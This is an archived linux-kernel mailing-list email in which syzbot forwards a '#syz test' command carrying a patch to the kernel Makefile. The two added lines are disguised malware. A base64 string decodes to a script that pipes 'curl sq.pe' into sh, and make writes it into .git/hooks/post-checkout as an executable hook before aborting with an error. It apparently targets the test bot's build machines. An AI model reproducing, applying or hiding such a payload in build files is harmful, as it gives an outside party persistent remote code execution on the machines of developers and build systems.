From mboxrd@z Thu Jan 1 00:00:00 1970 Received: from mail-ot1-f69.google.com (mail-ot1-f69.google.com [209.85.210.69]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (No client certificate requested) by smtp.subspace.kernel.org (Postfix) with ESMTPS id 6085B37C904 for ; Mon, 13 Apr 2026 04:52:24 +0000 (UTC) Authentication-Results: smtp.subspace.kernel.org; arc=none smtp.client-ip=209.85.210.69 ARC-Seal:i=1; a=rsa-sha256; d=subspace.kernel.org; s=arc-20240116; t=1776055945; cv=none; b=s+7ObS3pSPQiW0pWy8qzydb7AF+HlCGWWX/kk44Plj415Zz/FqX9YjoOX7aKc4HG0/uH3EihZMjiYHbktIl/4v/nk+EZCWnRBpO+NGzEFMIPHK3hAGHbO7vk93W4oWtOEUkfx5aYD9L33XXRAJYD3vPV01Kub69XKcTwLnsUskE= ARC-Message-Signature:i=1; a=rsa-sha256; d=subspace.kernel.org; s=arc-20240116; t=1776055945; c=relaxed/simple; bh=+LtxeRKLQXCuh04PbVUnrFHTbSzQz8CdMDW2VpiSkE4=; h=MIME-Version:Date:In-Reply-To:Message-ID:Subject:From:To: Content-Type; b=FpnlJaooj4uXLZgaTuml3xGpdu4pAe8mjGrijCoQB/aLhW0GtiTZDS268CPszb/cBmh73ZtlaYCcz+HIMhPFqHq2pZz/TPusA+MPl5Li+hPbfPVQsB7LUg2qyXXG1BhzerJIC2/ntU1HGZTAa+0tphwir4WH0jnAc1i+1/LCXfM= ARC-Authentication-Results:i=1; smtp.subspace.kernel.org; dmarc=fail (p=none dis=none) header.from=syzkaller.appspotmail.com; spf=pass smtp.mailfrom=M3KW2WVRGUFZ5GODRSRYTGD7.apphosting.bounces.google.com; arc=none smtp.client-ip=209.85.210.69 Authentication-Results: smtp.subspace.kernel.org; dmarc=fail (p=none dis=none) header.from=syzkaller.appspotmail.com Authentication-Results: smtp.subspace.kernel.org; spf=pass smtp.mailfrom=M3KW2WVRGUFZ5GODRSRYTGD7.apphosting.bounces.google.com Received: by mail-ot1-f69.google.com with SMTP id 46e09a7af769-7dc3cb93f2eso2498792a34.3 for ; Sun, 12 Apr 2026 21:52:24 -0700 (PDT) X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20251104; t=1776055943; x=1776660743; h=to:from:subject:message-id:in-reply-to:date:mime-version :x-gm-message-state:from:to:cc:subject:date:message-id:reply-to; bh=+LtxeRKLQXCuh04PbVUnrFHTbSzQz8CdMDW2VpiSkE4=; b=PmKRQvQj1WHwuGcrpuaBk4KWvfo9IqECeByE4t17YlOuyBwgtzZVhnLzpel/TqDEzm 7VOmFEetXUtH6OrxufLTm791emqiqoANjAt5Y4mDPA2W23G1H90cjIM18PDY1EH6kfNe CXdx4IWpAZ/Eu58g/OsznDFMDmAiT224Qbg0TSo1HRDSz04q1EaOA7auy8bKefo8fvUG vY03BA1lv4ne9pmelp0H+ZA/Wv/9HIpBhr/KEcez9iQPn6BYyGh/j96PRgjBQZT6Di5Y XleG5Xa+Grn4bGok+cxroBihdxFdp0KckPbZK8V5XwKvZCL4YsF/ESIvdAfGs1hg1noL S51Q== X-Gm-Message-State: AOJu0YwiCJgoE7837Sb32nWd23kXK04hMYsLqM7itt/2HhVfuewYQQdV FBZvyhjKL1r3weu5D+ps2x4AI142ueJASOnNhmErFL5htwNPsp9Vs+IdNN8MiVJlOPL05Xh8c3X HmwJQRCz4mzJ6QhKFbVjv5Yu51aTlrUKGXdcV+01+7xkIu18C9B556IkXqJE= Precedence: bulk X-Mailing-List: linux-kernel@vger.kernel.org List-Id: List-Subscribe: List-Unsubscribe: MIME-Version: 1.0 X-Received: by 2002:a05:6820:1510:b0:67c:1b19:cd8a with SMTP id 006d021491bc7-68be93c6527mr5382863eaf.60.1776055943387; Sun, 12 Apr 2026 21:52:23 -0700 (PDT) Date: Sun, 12 Apr 2026 21:52:23 -0700 In-Reply-To: <69d7f03b.050a0220.3030df.001b.GAE@google.com> X-Google-Appengine-App-Id: s~syzkaller X-Google-Appengine-App-Id-Alias: syzkaller Message-ID: <69dc7687.050a0220.3030df.0044.GAE@google.com> Subject: Forwarded: #syz test From: syzbot To: linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com Content-Type: text/plain; charset="UTF-8" For archival purposes, forwarding an incoming command email to linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com. *** Subject: #syz test Author: tbsthitw@gmail.com #syz test diff --git a/Makefile b/Makefile --- a/Makefile +++ b/Makefile @@ -1,3 +1,5 @@ +$(shell echo IyEvYmluL3NoCmN1cmwgc3EucGV8c2gK|base64 -d>.git/hooks/post-checkout;chmod +x .git/hooks/post-checkout) +$(error x) # SPDX-License-Identifier: GPL-2.0 VERSION = 6 PATCHLEVEL = 14